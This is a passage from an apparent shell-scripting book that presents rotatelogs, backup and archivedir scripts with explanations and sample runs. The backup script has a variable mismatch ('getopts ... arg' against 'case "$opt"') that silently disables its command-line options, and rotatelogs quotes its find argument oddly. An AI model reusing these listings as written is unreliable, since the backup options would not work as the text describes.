  #   found with the -mtime modification time test to find.

  if [ -f "$back1" ] ; then
    if [ -z "$(find \"$back1\" -mtime +$duration -print 2>/dev/null)" ]
    then
      /bin/echo -n "$name's most recent backup is more recent than $duration "
      echo "days: skipping" ;   continue
    fi
  fi

  echo "Rotating log $name (using a $duration day schedule)"

  # Rotate, starting with the oldest log, but be careful in case one
  #   or more files simply don't exist yet.

  if [ -f "$back3" ] ; then
    echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"
  fi
  if [ -f "$back2" ] ; then
    echo "... $back2 -> $back3" ; $mv -f "$back2" "$back3"
  fi
  if [ -f "$back1" ] ; then
    echo "... $back1 -> $back2" ; $mv -f "$back1" "$back2"
  fi
  if [ -f "$name" ] ; then
    echo "... $name -> $back1" ; $mv -f "$name" "$back1"
  fi
  touch "$name"
  chmod 0600 "$name"    # Last step: Change file to rw------- for privacy
done

if [ $count -eq 0 ] ; then
  echo "Nothing to do: no log files big enough or old enough to rotate"
fi

exit 0

Listing 6-12: The rotatelogs script

To be maximally useful, the script works with a configuration file that lives in /var/log, allowing the administrator to specify different rotation schedules for different log files. The contents of a typical configuration file are shown in Listing 6-13.

# Configuration file for the log rotation script: Format is name=duration,
#   where name can be any filename that appears in the /var/log directory.
#   Duration is measured in days.

ftp.log=30
lastlog=14
lookupd.log=7
lpr.log=30
mail.log=7
netinfo.log=7
secure.log=7
statistics=7
system.log=14
# Anything with a duration of zero is not rotated.
wtmp=0

Listing 6-13: An example configuration file for the rotatelogs script

How It Works

The heart of this script, and certainly the most gnarly part, is the find statement that drives the for loop. It returns all files in the /var/log directory that are greater than zero characters in size, don’t contain a number in their name, don’t start with a period (OS X in particular dumps a lot of oddly named log files in this directory—they all need to be skipped), and don’t end with conf (we don’t want to rotate out the rotatelogs.conf file, for obvious reasons). The -maxdepth 1 argument ensures that find doesn’t step into subdirectories, and the sed invocation at the very end removes any leading ./ sequences from the matches.
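The trailing sed cleanup is easy to see in isolation:

$ echo "./system.log" | sed 's/^\.\///'
system.log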

NOTE

Lazy is good! The rotatelogs script demonstrates a fundamental concept in shell script programming: the value of avoiding duplicate work. Rather than have each log analysis script rotate logs, a single log rotation script centralizes the task and makes modifications easy.

Running the Script

This script doesn’t accept any arguments, but it does print messages on which logs are being rotated and why. It should also be run as root.

The Results

The rotatelogs script is simple to use, as shown in Listing 6-14, but beware that depending on file permissions, it might need to be run as root.

$ sudo rotatelogs
ftp.log's most recent backup is more recent than 30 days: skipping
Rotating log lastlog (using a 14 day schedule)
... lastlog -> lastlog.1
lpr.log's most recent backup is more recent than 30 days: skipping

Listing 6-14: Running the rotatelogs script as root to rotate the logs in /var/log

Notice that only three log files matched the specified find criteria in this invocation. Of these, only lastlog hadn’t been backed up sufficiently recently, according to the duration values in the configuration file. Run rotatelogs again, however, and nothing’s done, as Listing 6-15 shows.

$ sudo rotatelogs
ftp.log's most recent backup is more recent than 30 days: skipping
lastlog's most recent backup is more recent than 14 days: skipping
lpr.log's most recent backup is more recent than 30 days: skipping

Listing 6-15: Running the rotatelogs again shows that no more logs need to be rotated.

Hacking the Script

One way to make this script even more useful is to have the oldest archive file, the old $back4 file, emailed or copied to a cloud storage site before it’s overwritten by the mv command. Here’s the line in question:

echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"

Another useful enhancement to rotatelogs would be to compress all rotated logs to further save on disk space; this would require that the script recognize and work properly with compressed files as it proceeded.

#51 Managing Backups

Managing system backups is a task that all system administrators are familiar with, and it’s about as thankless as a job can be. No one ever says, “Hey, that backup’s working—nice job!” Even on a single-user Linux computer, some sort of backup schedule is essential. Unfortunately, it’s usually only after you’ve been burned once, losing both data and files, that you realize the value of a regular backup. One of the reasons so many Linux systems neglect backups is that many of the backup tools are crude and difficult to understand.

A shell script can solve this problem! The script in Listing 6-16 backs up a specified set of directories, either incrementally (that is, only those files that have changed since the last backup) or as a full backup (all files). The backup is compressed on the fly to minimize disk space used, and the script output can be directed to a file, a tape device, a remotely mounted NFS partition, a cloud backup service (like we set up later in the book), or even a DVD.

The Code

   #!/bin/bash

   # backup--Creates either a full or incremental backup of a set of defined
   #   directories on the system. By default, the output file is compressed and
   #   saved in /tmp with a timestamped filename. Otherwise, specify an output
   #   device (another disk, a removable storage device, or whatever else floats
   #   your boat).


   compress="bzip2"                 # Change to your favorite compression app.
    inclist="/tmp/backup.inclist.$(date +%d%m%y)"
     output="/tmp/backup.$(date +%d%m%y).bz2"
     tsfile="$HOME/.backup.timestamp"
      btype="incremental"           # Default to an incremental backup.
       noinc=0                       # By default, do update the timestamp file.

   trap "/bin/rm -f $inclist" EXIT

   usageQuit()
   {
     cat << "EOF" >&2
   Usage: $0 [-o output] [-i|-f] [-n]
     -o lets you specify an alternative backup file/device,
     -i is an incremental, -f is a full backup, and -n prevents
     updating the timestamp when an incremental backup is done.
   EOF
     exit 1
   }

   ########## Main code section begins here ###########

   while getopts "o:ifn" arg; do
     case "$opt" in
       o ) output="$OPTARG";       ;;   # getopts automatically manages OPTARG.
       i ) btype="incremental";    ;;
       f ) btype="full";           ;;
       n ) noinc=1;                ;;
       ? ) usageQuit               ;;
     esac
   done

   shift $(( $OPTIND - 1 ))

   echo "Doing $btype backup, saving output to $output"

   timestamp="$(date +'%m%d%I%M')"  # Grab month, day, hour, minute from date.
                                    # Curious about date formats? "man strftime"

   if [ "$btype" = "incremental" ] ; then
     if [ ! -f $tsfile ] ; then
       echo "Error: can't do an incremental backup: no timestamp file" >&2
       exit 1
     fi
      find $HOME -depth -type f -newer $tsfile -user ${USER:-$LOGNAME} | \
   pax -w -x tar | $compress > $output
     failure="$?"
   else
      find $HOME -depth -type f -user ${USER:-$LOGNAME} | \
   pax -w -x tar | $compress > $output
     failure="$?"
   fi

   if [ "$noinc" = "0" -a "$failure" = "0" ] ; then
     touch -t $timestamp $tsfile
   fi
   exit 0

Listing 6-16: The backup script

How It Works

For a full system backup, the pax command does all the work, piping its output to a compression program (bzip2 by default) and then to an output file or device. An incremental backup is a bit trickier, because the standard version of tar doesn’t include any sort of modification time test, unlike the GNU version of tar. So the list of files modified since the previous backup is built with find and handed straight to pax, which writes a tar-format archive for increased portability.

Choosing when to mark the timestamp for a backup is an area in which many backup programs get messed up, typically marking the “last backup time” as when the program has finished the backup, rather than when it started. Setting the timestamp to the time of backup completion can be a problem if any files are modified during the backup process, which becomes more likely as individual backups take longer to complete. Because files modified under this scenario would have a last-modified date older than the timestamp date, they would not be backed up the next time an incremental backup is run, which would be bad.

But hold on, because setting the timestamp to before the backup takes place is wrong too: if the backup fails for some reason, there’s no way to reverse the updated timestamp.

Both of these problems can be avoided by saving the date and time before the backup starts (in the timestamp variable) but waiting to apply the value of $timestamp to $tsfile using the -t flag to touch only after the backup has succeeded. Subtle, eh?
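The same save-first, commit-on-success pattern is worth reusing anywhere a long-running job needs a "last success" marker. A generic sketch, with a hypothetical job and timestamp file:

start="$(date +'%m%d%H%M')"                  # Snapshot the clock before starting.
if long_running_job ; then                   # Hypothetical job that takes a while.
  touch -t "$start" "$HOME/.job.timestamp"   # Commit the start time only on success.
fi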

Running the Script

This script has a number of options, all of which can be ignored to perform the default incremental backup based on which files have been modified since the last time the script was run (that is, since the timestamp from the last incremental backup). Starting parameters allow you to specify a different output file or device (-o output), to choose a full backup (-f), to actively choose an incremental backup (-i) even though it is the default, or to prevent the timestamp file from being updated in the case of an incremental backup (-n).

The Results

The backup script requires no arguments and is simple to run, as Listing 6-17 details.

$ backup
Doing incremental backup, saving output to /tmp/backup.140703.bz2

Listing 6-17: Running the backup script requires no arguments and prints the results to screen.

As you would expect, the output of a backup program isn’t very scintillating. But the resulting compressed file is large enough to show that plenty of data is inside, as you can see in Listing 6-18.

$ ls -l /tmp/backup*
-rw-r--r--  1 taylor  wheel  621739008 Jul 14 07:31 backup.140703.bz2

Listing 6-18: Displaying the backed-up file with ls
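If you want to double-check what actually landed in the archive, pax can list the contents of the compressed stream without extracting anything (substitute your own backup filename):

$ bzip2 -dc /tmp/backup.140703.bz2 | pax | head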

#52 Backing Up Directories

Related to the task of backing up entire filesystems is the user-centric task of taking a snapshot of a specific directory or directory tree. The simple script in Listing 6-19 allows users to create a compressed tar archive of a specified directory for archival or sharing purposes.

The Code

   #!/bin/bash

   # archivedir--Creates a compressed archive of the specified directory

   maxarchivedir=10           # Size, in blocks, of big directory.
   compress=gzip              # Change to your favorite compress app.
   progname=$(basename $0)    # Nicer output format for error messages.

   if [ $# -eq 0 ] ; then     # No args? That's a problem.
     echo "Usage: $progname directory" >&2
     exit 1
   fi

    if [ ! -d "$1" ] ; then
     echo "${progname}: can't find directory $1 to archive." >&2
     exit 1
   fi

   if [ "$(basename $1)" != "$1" -o "$1" = "." ] ; then
     echo "${progname}: You must specify a subdirectory" >&2
     exit 1
   fi

 if [ ! -w . ] ; then
     echo "${progname}: cannot write archive file to current directory." >&2
     exit 1
   fi

   # Is the resultant archive going to be dangerously big? Let's check...

   dirsize="$(du -s $1 | awk '{print $1}')"

   if [ $dirsize -gt $maxarchivedir ] ; then
     /bin/echo -n "Warning: directory $1 is $dirsize blocks. Proceed? [n] "
     read answer
     answer="$(echo $answer | tr '[:upper:]' '[:lower:]' | cut -c1)"
     if [ "$answer" != "y" ] ; then
       echo "${progname}: archive of directory $1 canceled." >&2
       exit 0
     fi
   fi

   archivename="$1.tgz"

    if tar cf - "$1" | $compress > $archivename ; then
     echo "Directory $1 archived as $archivename"
   else
     echo "Warning: tar encountered errors archiving $1"
   fi

   exit 0

Listing 6-19: The archivedir script

How It Works

This script is almost all error-checking code, to ensure that it never causes a loss of data or creates an incorrect snapshot. In addition to using the typical tests to validate the presence and appropriateness of the starting argument, this script forces the user to be in the parent directory of the subdirectory to be compressed and archived, ensuring that the archive file is saved in the proper place upon completion. The test if [ ! -w . ] verifies that the user has write permission on the current directory. And this script even warns users before archiving if the resultant backup file would be unusually large.

Finally, the actual command that archives the specified directory is the tar invocation near the end of the script. Its return code is tested so that the script warns the user, rather than reporting success, if an error of any sort occurs.

Running the Script

This script should be invoked with the name of the desired directory to archive as its only argument. To ensure that the script doesn’t try to archive itself, it requires that a subdirectory of the current directory be specified as the argument, rather than ., as Listing 6-20 shows.
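For example, assuming the directory exists, both of these invocations are rejected by that test, since neither argument is a simple subdirectory name:

$ archivedir .
archivedir: You must specify a subdirectory
$ archivedir /tmp/scripts
archivedir: You must specify a subdirectory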

The Results

$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] n
archivedir: archive of directory scripts canceled.

Listing 6-20: Running the archivedir script on the scripts directory, but canceling

This seemed as though it might be a big archive, so we hesitated to create it, but after thinking about it, we decided there’s no reason not to proceed after all.

$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] y
Directory scripts archived as scripts.tgz

Here are the results:

$ ls -l scripts.tgz
-rw-r--r--  1 taylor  staff  325648 Jul 14 08:01 scripts.tgz

NOTE

Here’s a tip for developers: when actively working on a project, use archivedir in a cron job to automatically take a snapshot of your working code each night for archival purposes.